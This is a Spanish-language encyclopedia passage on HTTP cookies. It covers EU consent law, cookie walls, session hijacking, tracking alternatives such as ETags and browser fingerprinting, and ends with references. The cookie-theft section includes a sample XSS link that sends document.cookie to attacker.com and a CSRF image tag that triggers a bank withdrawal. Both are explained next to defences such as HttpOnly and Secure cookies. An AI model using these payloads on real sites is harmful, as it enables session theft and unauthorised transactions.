El consentimiento bajo la combinación del GDPR y la Directiva de privacidad electrónica debe cumplir una serie de condiciones en relación con las cookies. [73] Debe darse libremente y sin ambigüedades: las casillas marcadas previamente se prohibieron tanto en la Directiva de protección de datos de 1995 [70] como en el RGPD (considerando 32). [74] El RGPD especifica que el consentimiento debe ser tan "fácil de retirar como de dar", [74] lo que significa que un botón de rechazar todo debe ser tan fácil de acceder en términos de clics y visibilidad como un botón de "aceptar todo" . [73] Debe ser específico e informado, lo que significa que el consentimiento se relaciona con propósitos particulares para el uso de estos datos, y todas las organizaciones que buscan usar este consentimiento deben ser nombradas específicamente. [75] [76]El Tribunal de Justicia de la Unión Europea también ha dictaminado que el consentimiento debe ser `` eficiente y oportuno '', lo que significa que debe obtenerse antes de que se coloquen las cookies y comience el procesamiento de datos en lugar de hacerlo después. [77]

La respuesta de la industria ha sido en gran medida negativa. Robert Bond, del bufete de abogados Speechly Bircham, describe los efectos como "de gran alcance e increíblemente onerosos" para "todas las empresas del Reino Unido". Simon Davis de Privacy International sostiene que una aplicación adecuada "destruiría toda la industria". [78] Sin embargo, los académicos señalan que la naturaleza onerosa de las ventanas emergentes de cookies se debe a un intento de continuar operando un modelo comercial a través de solicitudes complicadas que pueden ser incompatibles con el GDPR. [71]

Tanto los estudios académicos como los reguladores describen un incumplimiento generalizado de la ley. Un estudio que analizó 10,000 sitios web del Reino Unido encontró que solo el 11,8% de los sitios cumplían con los requisitos legales mínimos, y solo el 33,4% de los sitios web estudiados proporcionaban un mecanismo para rechazar las cookies que era tan fácil de usar como aceptarlas. [73] Un estudio de 17.000 sitios web encontró que el 84% de los sitios incumplieron este criterio, y encontró además que muchos colocaron cookies de terceros sin previo aviso. [79] El regulador del Reino Unido, la Oficina del Comisionado de Información , declaró en 2019 que el 'Marco de Transparencia y Consentimiento' de la industria del grupo de tecnología publicitaria Interactive Advertising Bureaufue "insuficiente para garantizar la transparencia y el procesamiento justo de los datos personales en cuestión y, por lo tanto, también insuficiente para proporcionar un consentimiento libre e informado, con las consiguientes implicaciones para el cumplimiento de PECR [e-Privacy]". [75] Muchas empresas que venden soluciones de cumplimiento (plataformas de gestión de consentimiento) permiten que se configuren de formas manifiestamente ilegales, lo que los académicos han señalado crea dudas en torno a la asignación adecuada de responsabilidad. [80]

La especificación P3P ofrece la posibilidad de que un servidor establezca una política de privacidad utilizando un campo de encabezado HTTP, que especifica qué tipo de información recopila y con qué propósito. Estas políticas incluyen (pero no se limitan a) el uso de la información recopilada mediante cookies. De acuerdo con la especificación P3P, un navegador puede aceptar o rechazar cookies comparando la política de privacidad con las preferencias del usuario almacenadas o preguntando al usuario, presentándole la política de privacidad declarada por el servidor. Sin embargo, los desarrolladores web criticaron la especificación P3P por su complejidad. Algunos sitios web no lo implementan correctamente. Por ejemplo, Facebook usó en broma "HONK" como su campo de encabezado P3P durante un período. [81] Solo Internet Explorer proporciona el soporte adecuado para la especificación.

La mayoría de los navegadores pueden bloquear las cookies de terceros para aumentar la privacidad y reducir el seguimiento por parte de las empresas de publicidad y seguimiento sin afectar negativamente la experiencia web del usuario en todos los sitios. Algunos sitios operan 'muros de cookies', que condicionan el acceso a un sitio a permitir cookies, ya sea técnicamente en un navegador, presionando 'aceptar', o ambos. [82] En 2020, el organismo regulador europeo, el Consejo Europeo de Protección de Datos, compuesto por todos los reguladores de protección de datos de la UE, declaró que los muros de cookies eran ilegales.

Para que el consentimiento se otorgue libremente, el acceso a los servicios y funcionalidades no debe estar condicionado al consentimiento de un usuario para el almacenamiento de información, u obtener acceso a información ya almacenada, en el equipo terminal de un usuario (llamado paredes de galletas). [83]

Muchos operadores de publicidad tienen una opción de exclusión voluntaria de la publicidad basada en el comportamiento, con una cookie genérica en el navegador que detiene la publicidad basada en el comportamiento. [81] [84] Sin embargo, esto a menudo es ineficaz contra muchas formas de seguimiento, como el seguimiento de primera persona que está ganando popularidad para evitar el impacto de los navegadores que bloquean las cookies de terceros. [85] [86] Además, si dicha configuración es más difícil de ubicar que la aceptación del seguimiento, sigue infringiendo las condiciones de la Directiva sobre privacidad electrónica. [73]

Robo de cookies y secuestro de sesiones

La mayoría de los sitios web utilizan cookies como los únicos identificadores para las sesiones de los usuarios, porque otros métodos para identificar a los usuarios web tienen limitaciones y vulnerabilidades. Si un sitio web utiliza cookies como identificadores de sesión, los atacantes pueden hacerse pasar por las solicitudes de los usuarios robando un conjunto completo de cookies de las víctimas. Desde el punto de vista del servidor web, una solicitud de un atacante tiene la misma autenticación que las solicitudes de la víctima; por lo tanto, la solicitud se realiza en nombre de la sesión de la víctima.

Aquí se enumeran varios escenarios de robo de cookies y secuestro de sesión de usuario (incluso sin robar cookies de usuario) que funcionan con sitios web que dependen únicamente de cookies HTTP para la identificación del usuario.

Espionaje de la red

Una cookie puede ser robada por otra computadora que tenga permiso para leer de la red.

El tráfico en una red puede ser interceptado y leído por computadoras en la red que no sean el remitente y el receptor (particularmente a través de Wi-Fi abierto no encriptado ). Este tráfico incluye cookies enviadas en sesiones HTTP ordinarias sin cifrar . Cuando el tráfico de la red no está encriptado, los atacantes pueden leer las comunicaciones de otros usuarios en la red, incluidas las cookies HTTP, así como el contenido completo de las conversaciones, con el propósito de un ataque de intermediario .

Un atacante podría utilizar cookies interceptadas para hacerse pasar por un usuario y realizar una tarea maliciosa, como transferir dinero de la cuenta bancaria de la víctima.

Este problema se puede resolver asegurando la comunicación entre la computadora del usuario y el servidor empleando Transport Layer Security ( protocolo HTTPS ) para cifrar la conexión. Un servidor puede especificar la Securebandera mientras configura una cookie, lo que hará que el navegador envíe la cookie solo a través de un canal cifrado, como una conexión TLS. [44]

Publicar un subdominio falso: envenenamiento de la caché de DNS

Si un atacante puede hacer que un servidor DNS almacene en caché una entrada de DNS fabricada (llamada envenenamiento de la caché de DNS ), esto podría permitirle al atacante obtener acceso a las cookies de un usuario. Por ejemplo, un atacante podría usar el envenenamiento de la caché de DNS para crear una entrada de DNS fabricada f12345.www.example.comque apunte a la dirección IP del servidor del atacante. El atacante puede publicar una URL de imagen desde su propio servidor (por ejemplo, http://f12345.www.example.com/img_4_cookie.jpg). Las víctimas que lean el mensaje del atacante descargarían esta imagen de f12345.www.example.com. Dado que f12345.www.example.comes un subdominio de www.example.com, los navegadores de las víctimas example.comenviarían todas las cookies relacionadas al servidor del atacante.

Si un atacante puede lograr esto, generalmente es culpa de los proveedores de servicios de Internet por no proteger adecuadamente sus servidores DNS. Sin embargo, la gravedad de este ataque puede reducirse si el sitio web de destino utiliza cookies seguras. En este caso, el atacante tendría el desafío adicional [87] de obtener el certificado TLS del sitio web de destino de una autoridad certificadora , ya que las cookies seguras solo se pueden transmitir a través de una conexión cifrada. Sin un certificado TLS coincidente, los navegadores de las víctimas mostrarían un mensaje de advertencia sobre el certificado no válido del atacante, lo que ayudaría a disuadir a los usuarios de visitar el sitio web fraudulento del atacante y enviarle sus cookies.

Secuencias de comandos entre sitios: robo de cookies

Las cookies también se pueden robar mediante una técnica llamada secuencia de comandos entre sitios. Esto ocurre cuando un atacante se aprovecha de un sitio web que permite a sus usuarios publicar contenido HTML y JavaScript sin filtrar . Al publicar código HTML y JavaScript malicioso, el atacante puede hacer que el navegador web de la víctima envíe las cookies de la víctima a un sitio web que controla el atacante.

Por ejemplo, un atacante puede publicar un mensaje www.example.comcon el siguiente enlace:

< a  href = "#"  onclick = "window.location = 'http://attacker.com/stole.cgi?text=' + escape (document.cookie); return false;" > ¡ Haga clic aquí! </ a >
Secuencias de comandos entre sitios: una cookie que solo debe intercambiarse entre un servidor y un cliente se envía a otra parte.

Cuando otro usuario hace clic en este enlace, el navegador ejecuta el fragmento de código dentro del onclickatributo, reemplazando así la cadena document.cookiecon la lista de cookies a las que se puede acceder desde la página actual. Como resultado, esta lista de cookies se envía al attacker.comservidor. Si la publicación maliciosa del atacante está en un sitio web HTTPS https://www.example.com, las cookies seguras también se enviarán a attacker.com en texto sin formato.

Es responsabilidad de los desarrolladores del sitio web filtrar dicho código malicioso.

Estos ataques se pueden mitigar mediante el uso de cookies HttpOnly. No se podrá acceder a estas cookies mediante lenguajes de secuencias de comandos del lado del cliente como JavaScript y, por lo tanto, el atacante no podrá recopilar estas cookies.

Secuencias de comandos entre sitios: solicitud de proxy

En versiones anteriores de muchos navegadores, había agujeros de seguridad en la implementación de la API XMLHttpRequest . Esta API permite que las páginas especifiquen un servidor proxy que obtendría la respuesta, y este servidor proxy no está sujeto a la política del mismo origen . Por ejemplo, una víctima está leyendo la publicación de un atacante en www.example.comy el script del atacante se ejecuta en el navegador de la víctima. El script genera una solicitud al www.example.comservidor proxy attacker.com. Dado que la solicitud es para www.example.com, todas las example.comcookies se enviarán junto con la solicitud, pero se enrutarán a través del servidor proxy del atacante. Por lo tanto, el atacante podría recolectar las cookies de la víctima.

Este ataque no funcionaría con cookies seguras, ya que solo se pueden transmitir a través de conexiones HTTPS y el protocolo HTTPS dicta el cifrado de extremo a extremo (es decir, la información se cifra en el navegador del usuario y se descifra en el servidor de destino). En este caso, el servidor proxy solo vería los bytes encriptados sin procesar de la solicitud HTTP.

Falsificación de solicitudes entre sitios

Por ejemplo, Bob podría estar navegando en un foro de chat donde otro usuario, Mallory, ha publicado un mensaje. Supongamos que Mallory ha creado un elemento de imagen HTML que hace referencia a una acción en el sitio web del banco de Bob (en lugar de un archivo de imagen), por ejemplo,

<img  src = "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Si el banco de Bob mantiene su información de autenticación en una cookie, y si la cookie no ha caducado, el intento del navegador de Bob de cargar la imagen enviará el formulario de retiro con su cookie, autorizando así una transacción sin la aprobación de Bob.

Cookiejacking

Cookiejacking es un ataque contra Internet Explorer que permite al atacante robar las cookies de sesión de un usuario engañándolo para que arrastre un objeto por la pantalla. [88] Microsoft consideró la falla de bajo riesgo debido al "nivel de interacción del usuario requerido", [88] y la necesidad de que un usuario ya haya iniciado sesión en el sitio web cuya cookie fue robada. [89] A pesar de esto, un investigador intentó atacar a 150 de sus amigos de Facebook y obtuvo cookies de 80 de ellos a través de ingeniería social . [88]

Inconvenientes de las cookies

Además de las preocupaciones por la privacidad, las cookies también tienen algunos inconvenientes técnicos. En particular, no siempre identifican con precisión a los usuarios, pueden usarse para ataques de seguridad y, a menudo, están en desacuerdo con el estilo arquitectónico del software Representational State Transfer ( REST ). [90] [91]

Identificación inexacta

Si se usa más de un navegador en una computadora, cada uno generalmente tiene un área de almacenamiento separada para las cookies. Por lo tanto, las cookies no identifican a una persona, sino una combinación de una cuenta de usuario, una computadora y un navegador web. Por lo tanto, cualquier persona que use varias cuentas, computadoras o navegadores tiene múltiples conjuntos de cookies. [92]

Asimismo, las cookies no distinguen entre varios usuarios que comparten la misma cuenta de usuario , computadora y navegador.

Estado inconsistente en cliente y servidor

El uso de cookies puede generar una inconsistencia entre el estado del cliente y el estado almacenado en la cookie. Si el usuario adquiere una cookie y luego hace clic en el botón "Atrás" del navegador, el estado del navegador generalmente no es el mismo que antes de esa adquisición. Por ejemplo, si el carrito de la compra de una tienda en línea se construye con cookies, es posible que el contenido del carrito no cambie cuando el usuario regrese al historial del navegador: si el usuario presiona un botón para agregar un artículo en el carrito de compras y luego hace clic en el botón "Atrás", el artículo permanece en el carrito de compras. Es posible que esta no sea la intención del usuario, que posiblemente quería deshacer la adición del elemento. Esto puede provocar falta de fiabilidad, confusión y errores.Por lo tanto, los desarrolladores web deben ser conscientes de este problema e implementar medidas para manejar tales situaciones.

Alternativas a las cookies

Algunas de las operaciones que se pueden realizar mediante cookies también se pueden realizar mediante otros mecanismos.

Tokens web JSON

Un JSON Web Token (JWT) es un paquete de información autónomo que se puede utilizar para almacenar la identidad del usuario y la información de autenticidad. Esto permite que se utilicen en lugar de cookies de sesión. A diferencia de las cookies, que el navegador adjunta automáticamente a cada solicitud HTTP, la aplicación web debe adjuntar explícitamente los JWT a cada solicitud HTTP.

Autenticación HTTP

El protocolo HTTP incluye la autenticación de acceso básica y los protocolos de autenticación de acceso implícito , que permiten el acceso a una página web solo cuando el usuario ha proporcionado el nombre de usuario y la contraseña correctos. Si el servidor requiere dichas credenciales para otorgar acceso a una página web, el navegador las solicita al usuario y, una vez obtenidas, el navegador las almacena y envía en cada solicitud de página posterior. Esta información puede ser usada para localizar al usuario.

dirección IP

Algunos usuarios pueden ser rastreados según la dirección IP de la computadora que solicita la página. El servidor conoce la dirección IP de la computadora que ejecuta el navegador (o el proxy , si se usa) y, en teoría, podría vincular la sesión de un usuario a esta dirección IP.

Sin embargo, las direcciones IP generalmente no son una forma confiable de rastrear una sesión o identificar a un usuario. Muchas computadoras diseñadas para ser utilizadas por un solo usuario, como las PC de oficina o domésticas, están detrás de un traductor de direcciones de red (NAT). Esto significa que varias PC compartirán una dirección IP pública. Además, algunos sistemas, como Tor , están diseñados para conservar el anonimato de Internet , lo que hace que el seguimiento por dirección IP sea poco práctico, imposible o un riesgo de seguridad.

URL (cadena de consulta)

Una técnica más precisa se basa en incrustar información en URL. La parte de la cadena de consulta de la URL es la parte que se usa normalmente para este propósito, pero también se pueden usar otras partes. Los mecanismos de sesión de Java Servlet y PHP utilizan este método si las cookies no están habilitadas.

Este método consiste en que el servidor web agregue cadenas de consulta que contienen un identificador de sesión único a todos los enlaces dentro de una página web. Cuando el usuario sigue un enlace, el navegador envía la cadena de consulta al servidor, lo que permite que el servidor identifique al usuario y mantenga el estado.

Este tipo de cadenas de consulta son muy similares a las cookies en el sentido de que ambas contienen información arbitraria elegida por el servidor y ambas se envían al servidor en cada solicitud. Sin embargo, hay algunas diferencias. Dado que una cadena de consulta es parte de una URL, si esa URL se reutiliza posteriormente, la misma información adjunta se enviará al servidor, lo que podría generar confusión. Por ejemplo, si las preferencias de un usuario están codificadas en la cadena de consulta de una URL y el usuario envía esta URL a otro usuario por correo electrónico , esas preferencias también se utilizarán para ese otro usuario.

Además, si el mismo usuario accede a la misma página varias veces desde diferentes fuentes, no hay garantía de que se utilice la misma cadena de consulta cada vez. Por ejemplo, si un usuario visita una página procedente de una página interna del sitio la primera vez y luego visita la misma página procedente de un motor de búsqueda externo la segunda vez, es probable que las cadenas de consulta sean diferentes. Si se utilizaran cookies en esta situación, las cookies serían las mismas.

Otros inconvenientes de las cadenas de consulta están relacionados con la seguridad. El almacenamiento de datos que identifica una sesión en una cadena de consulta permite la fijación de sesión ataques, árbitro ataques de registro y otros fallos de seguridad . La transferencia de identificadores de sesión como cookies HTTP es más segura.

Campos de formulario ocultos

Otra forma de seguimiento de sesiones es utilizar formularios web con campos ocultos. Esta técnica es muy similar al uso de cadenas de consulta de URL para contener la información y tiene muchas de las mismas ventajas e inconvenientes. De hecho, si el formulario se maneja con el método HTTP GET, esta técnica es similar al uso de cadenas de consulta de URL, ya que el método GET agrega los campos del formulario a la URL como una cadena de consulta. Pero la mayoría de los formularios se manejan con HTTP POST, lo que hace que la información del formulario, incluidos los campos ocultos, se envíe en el cuerpo de la solicitud HTTP, que no forma parte de la URL ni de una cookie.

Este enfoque presenta dos ventajas desde el punto de vista del rastreador. Primero, tener la información de seguimiento colocada en el cuerpo de la solicitud HTTP en lugar de en la URL significa que el usuario promedio no la notará. En segundo lugar, la información de la sesión no se copia cuando el usuario copia la URL (para marcar la página o enviarla por correo electrónico, por ejemplo).

Propiedad DOM "window.name"

Todos los navegadores web actuales pueden almacenar una gran cantidad de datos (2–32 MB) a través de JavaScript utilizando la propiedad DOMwindow.name . Estos datos se pueden utilizar en lugar de cookies de sesión y también son de dominio cruzado. La técnica se puede combinar con objetos JSON / JavaScript para almacenar conjuntos complejos de variables de sesión [93] en el lado del cliente.

La desventaja es que cada ventana o pestaña separada inicialmente tendrá una window.namepropiedad vacía cuando se abra. Además, la propiedad se puede utilizar para rastrear visitantes a través de diferentes sitios web, por lo que es una preocupación para la privacidad en Internet .

En algunos aspectos, esto puede ser más seguro que las cookies debido al hecho de que su contenido no se envía automáticamente al servidor en cada solicitud como lo son las cookies, por lo que no es vulnerable a los ataques de rastreo de cookies de red. Sin embargo, si no se toman medidas especiales para proteger los datos, es vulnerable a otros ataques porque los datos están disponibles en diferentes sitios web abiertos en la misma ventana o pestaña.

Identificador de anunciantes

Apple utiliza una técnica de seguimiento llamada " Identificador de anunciantes " (IDFA). Esta técnica asigna un identificador único a cada usuario que compra un dispositivo Apple iOS (como un iPhone o iPad). Luego, la red publicitaria de Apple, iAd , utiliza este identificador para determinar los anuncios que las personas ven y a los que responden. [94]

ETag

Debido a que el navegador almacena las ETag en caché y las devuelve con solicitudes posteriores para el mismo recurso, un servidor de seguimiento puede simplemente repetir cualquier ETag recibida del navegador para garantizar que una ETag asignada persista indefinidamente (de manera similar a las cookies persistentes). Los campos de encabezado de almacenamiento en caché adicionales también pueden mejorar la preservación de los datos de ETag.

Los ETags se pueden vaciar en algunos navegadores borrando la caché del navegador .

almacenamiento web

Algunos navegadores web admiten mecanismos de persistencia que permiten que la página almacene la información localmente para su uso posterior.

El estándar HTML5 (que la mayoría de los navegadores web modernos admiten hasta cierto punto) incluye una API de JavaScript denominada almacenamiento web que permite dos tipos de almacenamiento: almacenamiento local y almacenamiento de sesiones. El almacenamiento local se comporta de manera similar a las cookies persistentes, mientras que el almacenamiento de sesión se comporta de manera similar a las cookies de sesión , excepto que el almacenamiento de sesión está vinculado a la vida útil de una pestaña / ventana individual (también conocido como una sesión de página), no a una sesión completa del navegador como las cookies de sesión. [95]

Internet Explorer admite información persistente [96] en el historial del navegador, en los favoritos del navegador, en un almacén XML ("datos de usuario") o directamente dentro de una página web guardada en el disco.

Algunos complementos de navegador web también incluyen mecanismos de persistencia. Por ejemplo, Adobe Flash tiene un objeto compartido local y Microsoft Silverlight tiene almacenamiento aislado. [97]

Caché de navegador

La caché del navegador también se puede usar para almacenar información que se puede usar para rastrear usuarios individuales. Esta técnica aprovecha el hecho de que el navegador web utilizará los recursos almacenados en la caché en lugar de descargarlos del sitio web cuando determine que la caché ya tiene la versión más actualizada del recurso.

Por ejemplo, un sitio web podría publicar un archivo JavaScript con un código que establezca un identificador único para el usuario (por ejemplo, var userId = 3243242;). Después de la visita inicial del usuario, cada vez que el usuario accede a la página, este archivo se cargará desde la caché en lugar de descargarse del servidor. Por lo tanto, su contenido nunca cambiará.

Huella digital del navegador

Una huella digital del navegador es información recopilada sobre la configuración de un navegador, como el número de versión, la resolución de pantalla y el sistema operativo, con fines de identificación. Las huellas digitales se pueden utilizar para identificar total o parcialmente a usuarios o dispositivos individuales incluso cuando las cookies están desactivadas.

La información básica de configuración del navegador web ha sido recopilada durante mucho tiempo por los servicios de análisis web en un esfuerzo por medir con precisión el tráfico web humano real y descartar varias formas de fraude de clics . Con la ayuda de los lenguajes de programación del lado del cliente , es posible la recopilación de parámetros mucho más esotéricos. [98] [99] La asimilación de dicha información en una sola cadena constituye una huella digital del dispositivo. En 2010, EFF midió al menos 18,1 bits de entropía posible a partir de las huellas dactilares del navegador. [100] La toma de huellas dactilares en lienzo , una técnica más reciente, afirma agregar otros 5.7 bits.

Ver también

  • HTML dinámico
  • Enterprise JavaBeans
  • Sesión (informática)
  • Cookie segura
  • Seguridad de transporte estricta HTTP § Problemas de privacidad

Referencias

  1. ↑ a b Vamosi, Robert (14 de abril de 2008). "Cookie de Gmail robada a través de Google Spreadsheets" . News.cnet.com . Archivado desde el original el 9 de diciembre de 2013 . Consultado el 19 de octubre de 2017 .
  2. ^ "¿Qué pasa con la" Directiva de cookies de la UE "?" . WebCookies.org. 2013. Archivado desde el original el 11 de octubre de 2017 . Consultado el 19 de octubre de 2017 .
  3. ^ "Nuevas reglas de red establecidas para hacer que las cookies se desmoronen" . BBC . 8 de marzo de 2011. Archivado desde el original el 10 de agosto de 2018 . Consultado el 21 de junio de 2018 .
  4. ^ "Sen. Rockefeller: prepárese para un proyecto de ley real de no seguimiento para publicidad en línea" . Adage.com . 6 de mayo de 2011. Archivado desde el original el 24 de agosto de 2011 . Consultado el 2 de junio de 2011 .
  5. ^ "De dónde viene la cookie :: DominoPower" . dominopower.com . Archivado desde el original el 19 de octubre de 2017 . Consultado el 19 de octubre de 2017 .
  6. ^ Raymond, Eric (ed.). "galleta mágica" . El archivo de jerga (versión 4.4.7) . Archivado desde el original el 6 de septiembre de 2017 . Consultado el 8 de septiembre de 2017 .CS1 maint: texto adicional: lista de autores ( enlace )
  7. ^ Schwartz, John (4 de septiembre de 2001). "Darle a la Web una memoria costó la privacidad de sus usuarios" . The New York Times . Archivado desde el original el 26 de agosto de 2011 . Consultado el 19 de febrero de 2017 .
  8. ^ a b Kesan, Jey; y Shah, Rajiv; Deconstructing Code Archivado 2018-08-19 en Archive-It , SSRN.com, capítulo II.B (cookies de Netscape), Yale Journal of Law and Technology, 6, 277–389
  9. ^ a b Kristol, David; Cookies HTTP: estándares, privacidad y política , ACM Transactions on Internet Technology, 1 (2), 151–198, 2001 doi : 10.1145 / 502152.502153 (una versión ampliada está disponible gratuitamente en [https://web.archive.org/ web / 20140716051321 / http: //arxiv.org/abs/cs.SE/0105018 Archivado el 16 de julio de 2014 en Wayback Machine arXiv: cs / 0105018v1 [cs.SE]])
  10. ^ "Comunicado de prensa: Netscape Communications ofrece un nuevo navegador de red gratuito en Internet" . Archivado desde el original el 7 de diciembre de 2006 . Consultado el 22 de mayo de 2010 .
  11. ^ "Publicación de Usenet por Marc Andreessen: ¡Aquí está, mundo!" . 13 de octubre de 1994. Archivado desde el original el 27 de abril de 2011 . Consultado el 22 de mayo de 2010 .
  12. ^ Kristol, David M. (noviembre de 2001). "Cookies HTTP" . Transacciones ACM sobre tecnología de Internet . 1 (2): 151-198. arXiv : cs / 0105018 . doi : 10.1145 / 502152.502153 . ISSN 1533-5399 . S2CID 1848140 .  
  13. ^ Hardmeier, Sandi (25 de agosto de 2005). "La historia de Internet Explorer" . Microsoft. Archivado desde el original el 1 de octubre de 2005 . Consultado el 4 de enero de 2009 .
  14. ^ Jackson, T (12 de febrero de 1996). "Este error en su PC es una cookie inteligente". Financial Times .
  15. ^ "Configuración de cookies" . staff.washington.edu . 19 de junio de 2009. Archivado desde el original el 16 de marzo de 2017 . Consultado el 15 de marzo de 2017 .
  16. ^ La versión 3.5 de la documentación de edbrowse decía "Tenga en cuenta que sólo se admiten las cookies de estilo Netscape. Sin embargo, este es el tipo de cookie más común. Probablemente satisfará sus necesidades". Este párrafo se eliminó en versiones posteriores de la documentación Archivado 2017-03-16 en Wayback Machine después de la desaprobación de RFC 2965.
  17. ^ Hodges, Jeff; Corry, Bil (6 de marzo de 2011). " ' Mecanismo de gestión de estado HTTP' al estándar propuesto" . La práctica de seguridad . Archivado desde el original el 7 de agosto de 2016 . Consultado el 17 de junio de 2016 .
  18. ^ "Set-Cookie2 - HTTP | MDN" . developer.mozilla.org . Consultado el 8 de marzo de 2021 .
  19. ^ Descripción de soporte técnico de Microsoft de cookies persistentes y por sesión en Internet Explorer. Archivado el25 de septiembre de 2011en Wayback Machine. Artículo ID 223799, 2007
  20. ^ "Mantener el estado de la sesión con cookies" . Red de desarrolladores de Microsoft . Archivado desde el original el 14 de octubre de 2012 . Consultado el 22 de octubre de 2012 .
  21. ^ " Atributo de cookie ' SameSite ', tatuajes de la plataforma Chrome" . Chromestatus.com . Archivado desde el original el 9 de mayo de 2016 . Consultado el 23 de abril de 2016 .
  22. ^ Goodwin, M .; Oeste. "Cookies del mismo sitio draft-ietf-httpbis-cookie-same-site-00" . tools.ietf.org . Archivado desde el original el 16 de agosto de 2016 . Consultado el 28 de julio de 2016 .
  23. ^ "Uso del atributo de cookie del mismo sitio para prevenir ataques CSRF" . www.netsparker.com . Consultado el 5 de abril de 2021 .
  24. ^ "Requerir" Seguro "para" SameSite = None ". Por miketaylr · Pull Request # 1323 · httpwg / http-extensions" . GitHub . Consultado el 5 de abril de 2021 .
  25. ^ "Prueba de compatibilidad del navegador del atributo de cookie 'SameSite'" .
  26. ^ "Cambios en las cookies de SameSite en febrero de 2020: lo que necesita saber" . Blog de Chromium . Consultado el 5 de abril de 2021 .
  27. ^ "Revertir temporalmente los cambios en las cookies del mismo sitio" . Blog de Chromium . Consultado el 5 de abril de 2021 .
  28. ^ "Dominios de terceros" . WebCookies.org. Archivado desde el original el 9 de diciembre de 2014 . Consultado el 7 de diciembre de 2014 .
  29. ^ "Número de cookies" . WebCookies.org. Archivado desde el original el 9 de diciembre de 2014 . Consultado el 7 de diciembre de 2014 .
  30. ^ Statt, Nick (24 de marzo de 2020). "Apple actualiza la tecnología anti-rastreo de Safari con un bloqueo total de cookies de terceros" . The Verge . Consultado el 24 de julio de 2020 .
  31. ^ "Firefox comienza a bloquear las cookies de terceros de forma predeterminada" . VentureBeat . 4 de junio de 2019 . Consultado el 24 de julio de 2020 .
  32. ^ Brave (6 de febrero de 2020). "OK Google, no retrase la privacidad real del navegador hasta 2022" . Brave Browser . Consultado el 24 de julio de 2020 .
  33. ^ Protalinski, Emil (19 de mayo de 2020). "Chrome 83 llega con la configuración de seguridad rediseñada, cookies de terceros bloqueadas en Incognito" . VentureBeat . VentureBeat . Consultado el 25 de junio de 2020 .
  34. ^ Martes, Sarah Sluis //; 14 de enero; Am, 2020-11: 00 (14 de enero de 2020). "Google Chrome eliminará las cookies de terceros en 2 años" . AdExchanger . Consultado el 24 de julio de 2020 .CS1 maint: nombres numéricos: lista de autores ( enlace )
  35. ^ "Obtenga más información sobre la lista de sufijos públicos" . Publicsuffix.org . Archivado desde el original el 14 de mayo de 2016 . Consultado el 28 de julio de 2016 .
  36. ^ Mayer, Jonathan (19 de agosto de 2011). "Seguimiento de los rastreadores: Microsoft Advertising" . El Centro de Internet y la Sociedad. Archivado desde el original el 26 de septiembre de 2011 . Consultado el 28 de septiembre de 2011 .
  37. ^ Vijayan, Jaikumar. "Microsoft deshabilita las 'supercookies' utilizadas en los visitantes de MSN.com" . Archivado desde el original el 27 de noviembre de 2014 . Consultado el 23 de noviembre de 2014 .
  38. ^ Steven Englehardt y Arthur Edelstein (26 de enero de 2021). "Firefox 85 toma medidas enérgicas contra las supercookies" .Mantenimiento de CS1: utiliza el parámetro de autores ( enlace )
  39. ^ Tigas, Julia Angwin, Mike. "Galleta zombi: la galleta de seguimiento que no puedes matar" . ProPublica . Consultado el 1 de noviembre de 2020 .
  40. ^ 11 de junio, Conrad Stolze |; Educación | 0, 2011 | (11 de junio de 2011). "¡La galleta que no se desmorona!" . Revista 24x7 . Consultado el 1 de noviembre de 2020 .CS1 maint: nombres numéricos: lista de autores ( enlace )
  41. ^ Peng, Weihong; Cisna, Jennifer (2000). "Cookies HTTP, una tecnología prometedora". ProQuest . Revisión de información en línea. ProQuest 194487945 . 
  42. ^ Jim Manico citando a Daniel Stenberg, Límites de longitud de las cookies en el mundo real. Archivado el 2 de julio de 2013 en Wayback Machine.
  43. ^ Rainie, Lee (2012). En red: el nuevo sistema operativo social. pag. 237
  44. ^ a b Mecanismo de administración de estado HTTP IETF , abril de 2011 Obsoletas RFC 2965
  45. ^ "Cookies HTTP de estado de cliente persistente: especificación preliminar" . Netscape. C. 1999. Archivado desde el original el 5 de agosto de 2007.
  46. ^ "Propiedad de la cookie" . MSDN . Microsoft. Archivado desde el original el 5 de abril de 2008 . Consultado el 4 de enero de 2009 .
  47. ^ Shannon, Ross (26 de febrero de 2007). "Cookies, configurar y recuperar información sobre sus lectores" . HTMLSource. Archivado desde el original el 26 de agosto de 2011 . Consultado el 4 de enero de 2009 .
  48. ^ "Mecanismo de gestión de estado HTTP, el atributo de ruta" . IETF . Marzo de 2014. Archivado desde el original el 1 de mayo de 2011 . Consultado el 12 de mayo de 2011 .
  49. ^ "RFC 6265, mecanismo de gestión de estado HTTP, coincidencia de dominio" . IETF . Marzo de 2014. Archivado desde el original el 1 de mayo de 2011 . Consultado el 12 de mayo de 2011 .
  50. ^ "RFC 6265, mecanismo de gestión de estado HTTP, el atributo de dominio" . IETF . Marzo de 2014. Archivado desde el original el 1 de mayo de 2011 . Consultado el 12 de mayo de 2011 .
  51. ^ "Internos de cookies de Internet Explorer (FAQ)" . 21 de noviembre de 2018.
  52. ^ "RFC 2109, Mecanismo de gestión de estado HTTP, sintaxis Set-Cookie" . IETF . Marzo de 2014. Archivado desde el original el 13 de marzo de 2014 . Consultado el 4 de marzo de 2014 .
  53. ^ "RFC 6265, Mecanismo de gestión de estado HTTP" . ietf.org . Archivado desde el original el 1 de mayo de 2011 . Consultado el 12 de mayo de 2011 .
  54. ^ "Compatibilidad de la especificación de cookies en navegadores modernos" . inikulin.github.io . 2016. Archivado desde el original el 2 de octubre de 2016 . Consultado el 30 de septiembre de 2016 .
  55. ^ Coles, Peter. "Cookies HTTP: ¿Cuál es la diferencia entre Max-age y Expires? - Peter Coles" . Mrcoles.com . Archivado desde el original el 29 de julio de 2016 . Consultado el 28 de julio de 2016 .
  56. ^ "Informe de amenazas a la seguridad de Internet de Symantec: Tendencias de julio a diciembre de 2007 (resumen ejecutivo)" (PDF) . XIII . Symantec Corp. Abril de 2008: 1–3. Archivado (PDF) desde el original el 25 de junio de 2008 . Consultado el 11 de mayo de 2008 . Cite journal requiere |journal=( ayuda )
  57. ^ Whalen, David (8 de junio de 2002). "Preguntas frecuentes sobre cookies no oficiales v2.6" . Cookie Central. Archivado desde el original el 26 de agosto de 2011 . Consultado el 4 de enero de 2009 .
  58. ^ "Cookies de terceros, almacenamiento DOM y privacidad" . grack.com: blog de Matt Mastracci. 6 de enero de 2010. Archivado desde el original el 24 de noviembre de 2010 . Consultado el 20 de septiembre de 2010 .
  59. ^ "Cómo administrar cookies en Internet Explorer 6" . Microsoft. 18 de diciembre de 2007. Archivado desde el original el 28 de diciembre de 2008 . Consultado el 4 de enero de 2009 .
